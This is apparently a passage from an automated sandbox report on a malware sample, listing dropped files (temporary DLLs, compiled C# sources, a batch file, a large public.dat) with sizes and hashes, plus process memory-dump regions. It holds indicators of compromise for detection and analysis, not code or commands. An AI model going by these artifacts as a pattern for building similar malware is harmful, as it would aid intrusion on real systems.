SHA512 4d37843ab228e4cd1bcb1d7ca776777c2f77f963ff2e2ae6e3b6c4add90bc7b342b982ebdbee7c1b58b3b7d8ee83032bd72eb5440b2759c89f71b365d1b5e74f
-
C:\Users\Admin\AppData\Local\Temp\rukl6ztm.pdb
Filesize 7KB
MD5 3981326b7b1dfa1e813dc947d5f01305
SHA1 49e33a19cb97890297ed7e6bfd84db220ac7391a
SHA256 7369e15a9b598b26ff7445e40318079903f7c94963bd6050c41d093ce6bac701
SHA512 c9123c59fa5f1b0f609dea74fa4ef17ffec97689ee7e6a5fe2178ba20dc2291d945eeece06f2d0119f128df88a8aa371c7da7de9aa5d0f8cd379513c35caf3c4
-
C:\Users\Admin\AppData\Local\Temp\temp.dat
Filesize 1KB
MD5 78480139d86520ba82766c5b3c9a7479
SHA1 436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a
SHA256 85438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c
SHA512 bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6
-
C:\Users\Admin\AppData\Local\Temp\ukph4mqo.dll
Filesize 3KB
MD5 9b2819e5439edb5ffe7d4e13f66c3ccc
SHA1 8aca0fdb4041e80b5fa2e08478af3c006bf0aea5
SHA256 cf48adda3100b27720a3a2b7c9a606b6f862ad87c2e938de85bc97902a121e1b
SHA512 97940e8ac5b729cc2e117a993e76d99c3c9a8b75966a8d1a65be338519a433f9bb39bdefd319200ae6d48459ab608138ed3aec5a89c9698b5e4f0f502d090456
-
C:\Users\Admin\AppData\Local\Temp\ukph4mqo.pdb
Filesize 7KB
MD5 6bf2b6f9429c1a59a06030368507e73f
SHA1 83c037906f4b25b028d1f9929dfc7ba4f0ecc6d1
SHA256 b537c3dce5de42d7d5375ca307d62c469da4198b8a41797c2650fe9059e51d60
SHA512 58ebef400326ead45634aeabf53f4e366fb6020886a652bf4a7d8f91f1f213e04c30633e4c01a01ca2ab508fd971303bfa86c13e29f2d619b5eb72f6d91d599f
-
C:\Users\Admin\AppData\Local\Temp\working.bat
Filesize 311B
MD5 a1640eb8f424ebe13b94955f8d0f6843
SHA1 8551e56c3e19861dbcae87f83b6d0ab225c3793d
SHA256 6c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399
SHA512 6b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8
-
C:\Users\Admin\AppData\Local\Temp\xkecb7mp.dll
Filesize 3KB
MD5 57c537bef22aae0d5c5c6f0243ca06c7
SHA1 25f9d045a5d4569006d9bb37312d21d1cb9d7831
SHA256 cd4a56ddee939b9399f0a2f3faabf7ddd8187694b612ed430985eec65f9bf62d
SHA512 dc6794cbabae9dd3e6f8b1eab9fa2b8de398ae0996f265012b7367beb2835550644701c1784a6af06be4742356149e01d4f6e0b16475de77af2746b3571cf65e
-
C:\Users\Admin\AppData\Local\Temp\xkecb7mp.pdb
Filesize 7KB
MD5 db2cdd624e830b3206e25ac4bc59853a
SHA1 c49dd4057a0efd54762b16b9d3c1664bd16dcec6
SHA256 ae5658eaa7b983d14403233a955127f2d967f5e77714b8d87438a24f8f010f0e
SHA512 ac82bb96e8dbc8c1e2fe090fae53572191f2b04ee65ed4cd456eef2c58765441cf0bd7e5176281022764a9c1238c78605e9cfce93c35d5d9ee2bf6fbd457aeca
-
C:\Users\Admin\AppData\Local\Temp\xknanuo7.dll
Filesize 3KB
MD5 575ab5df23e130b4d0f25034059f87cd
SHA1 d98c6ee2e10bc8b26df6b4e697c2ec9fec6f8da2
SHA256 99b23aef8aa7a372d2518153e73b6998bdf5c9ad5bd33ba21d440ce1d625622d
SHA512 d8c121621e45c827cf7e412c5793bb1946612817717696a91b661994426f8105c3024ac6e82b90b377d6dce4257e1fec3d0380b90bbe9266cefc57e1f25908de
-
C:\Users\Admin\AppData\Local\Temp\xknanuo7.pdb
Filesize 7KB
MD5 8b14b1d8233eee0827a500493c3fcfc0
SHA1 15f3cdf6a47abb11ed5a92c31f40cc1b847c6fab
SHA256 3a9284e06052baae6196dca9765746949731cc9c328026a191fce5383b3fbad7
SHA512 1d5d96d99f0643c01f4a987d9b4bb90278bd696e93095d8efafa3da06d08aeb1108d6d8ba7d78f29d0d504f62f21cc9d014ec6c4161bb74c3bdbf694c7f30e0e
-
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
Filesize 3KB
MD5 55ee6264f8d6281b8529d2083f001b1b
SHA1 25884c0ec50473dbd9b35d6306265510e9eaa57c
SHA256 791e1ce871c58ea10b3d241899e389ef95aa1491b6f8925f6a53e5d40cf749a5
SHA512 1acf7db88cf0f16b849f93149f9a9d54a3c79678d9d8effe242ea7eeb263af2a6bda5dfcb488adf5643e0593e094c55deb82749bc711f5a6c48223a871529386
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize 7KB
MD5 7c022289600ad8415e0a36206f6b50e4
SHA1 6a4623df8f64d2053f9e5edceb2ffd7077b6034c
SHA256 149eb0f8cd6cdbfb8cf7f6a5b4ab56c78b8b5232ba48e5ec48217654c4313caa
SHA512 a72bb418c66f06830e8ed9aa28ce17bf00cd6fbdc927263f2c9fed414993b5f3b9d09a70619d42ed01f94c075bcd46834692aae8534ffe85a501d6bfd4f0fc7d
-
C:\Users\Public\public.dat
Filesize 869KB
MD5 31aeb43b981d4d6272193e321bb21333
SHA1 84a21d2eb2847bcb53442e0aa7ab3f90dd796a61
SHA256 903b02ff3ef690ea53103737a07c36a732bd81ab04f78d6f5eb61ac0fc6f98a6
SHA512 7efb4cfd865a59b51b46e7071e3b346808a41621e893e6867658827c628d77866737697084c9b7c2cef110942aa2ad21e932642ef5feadb379cf8e7257b4cc88
-
\??\PIPE\srvsvc
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\CSC7178.tmp
Filesize 652B
MD5 6097be112ec97881c808860b929befaf
SHA1 57e4b6db93e2915a1f6caf3e7c64a4abc5ff4cda
SHA256 90400c3aa711039f8e80b08ee994a37801215d5187f285f354cbc7a7d9ae166b
SHA512 f8081647fa5f2206d39a13305c7f0d79f1ee131d74796b8901601f7f19c16949d25aef1151e6881c2114ee36cd18f7fb28fc58a982ed6870cae2f927160ff6c5
-
\??\c:\Users\Admin\AppData\Local\Temp\CSCA229.tmp
Filesize 652B
MD5 8ccf7e30280fdb0ce9d666669f537371
SHA1 8c6c909659c468b392050d6b757389c77ac61023
SHA256 2750cebf7f2966cd35010673256f726e0b288eb2e58e63c4330e190ee64f51aa
SHA512 c296f51a8105d919cce1d04796a76aecaf98fc00edc24501f77ffe77f5dedc891521612b5a9dcf259b5d26f4ce595c86eac571ed5ebe47d2da6e3057f381913f
-
\??\c:\Users\Admin\AppData\Local\Temp\CSCA257.tmp
Filesize 652B
MD5 84129947547d17f3b999964426c41950
SHA1 000c20009405f91af963e27cc1f11e3afe165d27
SHA256 dd96182bc08d5d7ab77c796d650642e99b419c7db112f4492d34945749ea371c
SHA512 008b6310c225462f019c31a5696fb36c545f3f6a46e1046d8f8b6000a5eaff1924174d86027ee574f517727514390ed08660a99487a1a8f072fdf885a4816390
-
\??\c:\Users\Admin\AppData\Local\Temp\CSCA2C5.tmp
Filesize 652B
MD5 6124e37f555b111f8f2f82cf88474417
SHA1 0c8adceef800bfd4da35d5ccb21925363f1711b3
SHA256 1eb5b4b7c0684074defe3ba5ec3d5f20281f467501c1d38d12b7b7d0be9b6b5a
SHA512 fd10733f0a1997287863b6153aea731e618650ef67c4f823ccc610ba308c96f572c4ca5cb0509c0641ce806de59711fe3619e2df3ef55dcd9db596e98ab1f0eb
-
\??\c:\Users\Admin\AppData\Local\Temp\CSCA39F.tmp
Filesize 652B
MD5 3bba6f074d8096681204dfa532f65dc7
SHA1 758a985d444a092b37fec9d26de58472ed3c1e40
SHA256 21c77de872488a4e6a1ba5b2611721cac734e2bcc3290f51b5bd2f59c002c332
SHA512 775da2f61f3a145cedae3a0edbfe2c65564c8add7074a4cb147f7e90f888a6b029ade326935b3307c4769da571cb4faf6315d3afafce02a301d2d5669e6d4f56
-
\??\c:\Users\Admin\AppData\Local\Temp\py4ddipt.0.cs
Filesize 334B
MD5 60a1152ec32b816b91530c7814deaacd
SHA1 68f979631b0485aaae41203c4b14f9ce710dbd6f
SHA256 e4ec47a88eab9b07792d97b02ce1724cb45118860e8156bdeb9f7268b0c258d2
SHA512 58de87e6877b5495a250b8af6117a29fd32ae169086f37ad640a2b8eac6500b62daf0340410094765984381025bcdde750bd250088d3e4840f7aa72e9459eb65
-
\??\c:\Users\Admin\AppData\Local\Temp\py4ddipt.cmdline
Filesize 309B
MD5 9183a9b1ad0c5f24561b52c2bbe2b8b2
SHA1 8535b661779fff9b55380d838a333ad39d194012
SHA256 38fb7de72904594f30ce5aa960605057e70a3b3f917cb935ac8c8f83174b8354
SHA512 882cdc2a0ce935b80315cfd5ba402773c20c31edf2655dd7ca3c062d12389d1a03afb860daca7b70e66473ec7fa43fb818fa9c550809dc8eeebc957d21b0ebeb
-
\??\c:\Users\Admin\AppData\Local\Temp\rukl6ztm.0.cs
Filesize 249B
MD5 69ecfeb3e9a8fb7890d114ec056ffd6d
SHA1 cba5334d2ffe24c60ef793a3f6a7f08067a913db
SHA256 0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58
SHA512 be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1
-
\??\c:\Users\Admin\AppData\Local\Temp\rukl6ztm.cmdline
Filesize 309B
MD5 7f8048363e6ab486571ddd6f61039f7c
SHA1 b06f52688a21e8339443262ee7f2c1bfba5052c8
SHA256 719d9025570f8795ffde003f9f1b0630b503d7c9deb3f8e809b59865cb15d0a2
SHA512 ec7262563c06162f205c2e570a20d3a78aeddbb7ea5605fa10ef2e1771e2105b2c98534fa9388e490ea0b0ac13635325e2b2f6fc0eddc98a59ee6f9f52248e12
-
\??\c:\Users\Admin\AppData\Local\Temp\ukph4mqo.0.cs
Filesize 272B
MD5 4de985ae7f625fc7a2ff3ace5a46e3c6
SHA1 935986466ba0b620860f36bf08f08721827771cb
SHA256 53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004
SHA512 067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393
-
\??\c:\Users\Admin\AppData\Local\Temp\ukph4mqo.cmdline
Filesize 309B
MD5 515fcee799c18067c69f44d609969fd0
SHA1 ba1d3540aa9b11d00764fe7ab120cd3e4cff7e20
SHA256 74f98191206ceb415f3deb41f5347a19a58d678ad6853f15fdee12d4f0ee6c18
SHA512 c81087d72e6eb723243a2c6fc210ff044c656f303aa98cd1e4a54f816610cb7b97cc6fa3e132d776acdd34f342cc89fc96871a0b5cda0baf1e298d914c324e41
-
\??\c:\Users\Admin\AppData\Local\Temp\xkecb7mp.0.cs
Filesize 259B
MD5 560e1b883a997afcfa3b73d8a5cddbc1
SHA1 2905f3f296ac3c7d6a020fb61f0819dbea2f1569
SHA256 e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea
SHA512 041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635
-
\??\c:\Users\Admin\AppData\Local\Temp\xkecb7mp.cmdline
Filesize 309B
MD5 668d260f297370f295cc0122a7104c03
SHA1 34899b6a87b473a013a48231caf872c31f455594
SHA256 d44a08789f9254d625768d31afd5a5a1f1109269f40eeb6ce509b6bacd94b657
SHA512 396cb303f8c7d7ee398e555d828f9abc905601bf9af56d16e334fbe4d2bfc81536fdd5c4e5de6286113c337b14e1ee67fffa84e2c2aa3058f1f1a95cebae14ee
-
\??\c:\Users\Admin\AppData\Local\Temp\xknanuo7.0.cs
Filesize 286B
MD5 b23df8158ffd79f95b9bddd18738270b
SHA1 79e81bb74bc53671aeabecae224f0f9fe0e3ed7f
SHA256 856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882
SHA512 e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f
-
\??\c:\Users\Admin\AppData\Local\Temp\xknanuo7.cmdline
Filesize 309B
MD5 d2612c627fe2237e2f6d85b295501589
SHA1 3abd8d4ded76ffdd6d5a1d9ad4e840ed5f770782
SHA256 ce10a8f86cffc93662472e03b1b5b0a33b63acc2615282efd3dd6ea26c2fbc7f
SHA512 e1a9ff5fd362a4e537ae41e5a95f9adc1da046e5ec23b2c0536f9cbeaa85c4ae814d157c98f4adb87dfd27dd88c871dd19469360db9df72695660e296c14577f
-
memory/340-152-0x00000000003C0000-0x0000000000400000-memory.dmp
Filesize 256KB
-
memory/1204-119-0x0000000002130000-0x0000000002170000-memory.dmp
Filesize 256KB
-
memory/1532-136-0x0000000001D80000-0x0000000001DC0000-memory.dmp
Filesize 256KB
-
memory/2496-76-0x00000000740F0000-0x000000007469B000-memory.dmp
Filesize 5.7MB
-
memory/2496-165-0x000000000C060000-0x000000000C143000-memory.dmp
Filesize 908KB
-
memory/2496-168-0x00000000020A0000-0x00000000020E0000-memory.dmp
Filesize 256KB
-
memory/2496-167-0x00000000740F0000-0x000000007469B000-memory.dmp
Filesize 5.7MB
-
memory/2496-166-0x000000000C060000-0x000000000C143000-memory.dmp
Filesize 908KB
-
memory/2496-163-0x0000000006CB0000-0x0000000006D8A000-memory.dmp
Filesize 872KB
-
memory/2496-77-0x00000000740F0000-0x000000007469B000-memory.dmp
Filesize 5.7MB
-
memory/2496-78-0x00000000020A0000-0x00000000020E0000-memory.dmp
Filesize 256KB
-
memory/2496-164-0x0000000006CB0000-0x0000000006D8A000-memory.dmp
Filesize 872KB
-
memory/2684-41-0x00000000026B0000-0x00000000026F0000-memory.dmp
Filesize 256KB
-
memory/2684-38-0x0000000074090000-0x000000007463B000-memory.dmp
Filesize 5.7MB
-
memory/2684-69-0x0000000074090000-0x000000007463B000-memory.dmp
Filesize 5.7MB
-
memory/2684-40-0x00000000026B0000-0x00000000026F0000-memory.dmp
Filesize 256KB
-
memory/2684-39-0x0000000074090000-0x000000007463B000-memory.dmp
Filesize 5.7MB
-
memory/2804-102-0x0000000002190000-0x00000000021D0000-memory.dmp
Filesize 256KB
-
memory/2964-47-0x0000000001E50000-0x0000000001E90000-memory.dmp
Filesize 256KB